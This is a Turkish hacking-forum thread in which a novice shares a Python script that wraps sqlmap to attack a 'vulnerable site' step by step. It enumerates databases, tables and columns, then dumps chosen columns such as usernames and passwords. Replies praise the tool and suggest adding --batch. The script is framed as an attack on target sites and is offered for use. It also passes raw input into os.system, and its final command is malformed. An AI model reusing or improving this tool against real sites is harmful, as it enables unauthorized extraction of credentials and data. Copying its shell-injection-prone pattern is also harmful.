sqlmap kolaylaştırıcı

porrsuk

Üye
15 Şub 2021
118
20
SQLMAP KOLAYLAŞTIRICI

BY_EXDU AND BY_/USR/BİN/BAŞI​

amacı sqlmap bilmeyenler için veya parametreleri yazamam üşeniyorum yada

tekrar tekrar çalıştır istemiyorum (ÖRN --> DATABASE BULDUN YENDEN ÇALIŞTIR TABLO BULDUN YENDEN ÇALIŞTIR) YAPMAK İSTEMİYORSAN

işte burda sqlmap kolaylaştırıcı gelir

l94kqk.png

virüstotal atmıyorum çünkü indirme link vermiyorum direk kod olarak atıyorum kontrol edebilirsiniz

Kod:
import os
from colorama import  Style, init, Fore

sql_key = "sqli"
exit_key = "exit"
attack2_key = "attack2"
attack3_key = "attack3"
final_key = "final"

print("SQLİ Saldırısı --> ", Fore.YELLOW + sql_key + Style.RESET_ALL)
print("Çıkış Yapmak   --> ", Fore.YELLOW + exit_key + Style.RESET_ALL)

while(True):
 try:
  secim = input("Seçmek istediğiniz seçeneği yazınız --> ")

if(secim == sql_key):
   link100 = input("Zaafiyetli siteyi giriniz (Örn: http://hedefsite.com/index.php?id=1) --> ")

os.system("sqlmap -u "+link100+" --dbs --batch")
   print("2. Saldırı-->", Fore.YELLOW + attack2_key + Style.RESET_ALL)

elif (secim == attack2_key):
   link101 = input("Zaafiyetli siteyi giriniz (Örn: http://hedefsite.com/index.php?id=1) --> ")
   database = input("Database ismini giriniz (Örn: Test_db) --> ")

os.system("sqlmap -u "+link101+" -D"+database+" --tables --batch")
   print("3. Saldırı-->", Fore.YELLOW + attack3_key + Style.RESET_ALL)

elif (secim == attack3_key):
   link102 = input("Zaafiyetli siteyi giriniz (Örn: http://hedefsite.com/index.php?id=1) --> ")
   database2 = input("Database ismini giriniz (Örn: Test_db) --> ")
   table = input("Tablo ismini giriniz (Örn: admin_user) --> ")

os.system("sqlmap -u "+link102+" -D"+database2+" -T"+table+" --columns --batch")
   print("Final_Saldırı-->", Fore.YELLOW + final_key + Style.RESET_ALL)

elif (secim == final_key):
   link103 = input("Zaafiyetli siteyi giriniz (Örn: http://hedefsite.com/index.php?id=1) --> ")
   database3 = input("Database ismini giriniz (Örn: Test_db) --> ")
   table2 = input("Tablo ismini giriniz (Örn: admin_user) --> ")
   columnn = input("Veri çekmek için column giriniz. (Örn:user)birden fazla veri çekmek için (Örn:user,pass) --> ")

os.system("sqlmap -u"+link103+"-D "+database3+"-T "+table2+"-C "+columnn+"--dump--all --batch")

break

elif (secim == exit_key):
    print("Çıkış yapılıyor...")
    exit()
    break
  else:
    print("Böyle bir seçenek bulunmamaktadır...!")
 except (KeyboardInterrupt):
    os.system("clear") # Eğer Windows işletim sisteminde kullanılacaksa " os.system("cls") olarak değiştirilebilir "  
    print("Klavye Çıkışı Algılandı Çıkış Yapılıyor...")
    exit()
sizce nasıl olmuş başarılımı ?

Eğer bir yerde hata varsa yazarsanız sevinirim . Yada süsleme örnekleri verirseniz sevinirim.

Bu arada Python da ve Bu sitede yeniyim sitede 1 ay falan olmuştur katılalı pythonda 1 -2 hafta yanlışlarım olursa söylerseniz sevinirim.

Moderatör tarafında düzenlendi:

EYLL'

Uzman üye
17 May 2019
1,540
188
Hudut
Güzel Olmuş eline sağlık.
--batch eklersen otomatik yes der. Daha güzel ve kullanışlı olur.

porrsuk

Üye
15 Şub 2021
118
20
bak onu biklmiyordum sqlmap te hep onu arıyordum bekle hemen ekleyem

ama onu koyunca önerilen N olursada direk onu yapıyor ben ekledim isteyen onu çıkarabilir --batch yi sadece varılsayanları kendisi direk evet diyor sana sormadan isteyen çıkarsın ben ekledim

Moderatör tarafında düzenlendi:

tugraberat

Üye
28 Nis 2021
123
1
C:/
eline sağlık turkhackteam youtube kanalında zaten sqlmap kullanım rehberi var bu kodlar sayesinde daha hızlı kullanabiliriz

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.